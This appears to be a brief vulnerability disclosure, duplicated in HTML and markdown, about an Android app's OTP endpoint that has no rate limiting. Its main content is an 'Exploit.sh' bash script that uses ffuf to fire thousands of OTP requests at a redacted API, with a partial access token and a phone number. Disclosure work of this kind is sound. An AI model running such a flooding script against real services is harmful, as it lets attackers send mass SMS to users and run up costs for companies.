Endpoint Requesting an otp but problem is there is no rate limiting. We can request unlimited otp’s.
I crafted A <code>ffuf Request</code> to make it fast and easier
<h2 id="heading-exploitshhttpexploitsh"><a target="_blank" href="http://Exploit.sh">Exploit.sh</a></h2>
<pre><code class="lang-bash">#! /bin/bash

seq 1 9999 | ffuf -u https://sub.redacted.com/api/v2/otp \
-H 'accessToken:9CaeE1dbeMDfUw...' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'User-Agent: okhttp/4.0.1 FUZZ' \
-replay-proxy http://localhost:8080 \
-d 'param1=value1&amp;data=919030178910 -w -
</code></pre>
<h1 id="heading-impact">Impact</h1>
<ol>
<li>Attacker can send mass sms to victim who uses the product.
</li>
<li>Over-using of resources leads to more cost to the company.
</li>
</ol>

Endpoint Requesting an otp but problem is there is no rate limiting. We can request unlimited otp’s.

I crafted A `ffuf Request` to make it fast and easier

## [Exploit.sh](http://Exploit.sh)

```bash
#! /bin/bash

seq 1  9999 | ffuf -u https://sub.redacted.com/api/v2/otp \
-H 'accessToken:9CaeE1dbeMDfUw...' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'User-Agent: okhttp/4.0.1 FUZZ' \
-replay-proxy http://localhost:8080 \
-d  'param1=value1&data=919030178910 -w -
```

# Impact

1. Attacker can send mass sms to victim who uses the product.
    
2. Over-using of resources leads to more cost to the company.

Android No Rate Limiting Leads to Mass SMS Brute-Force

Exploit.sh

Impact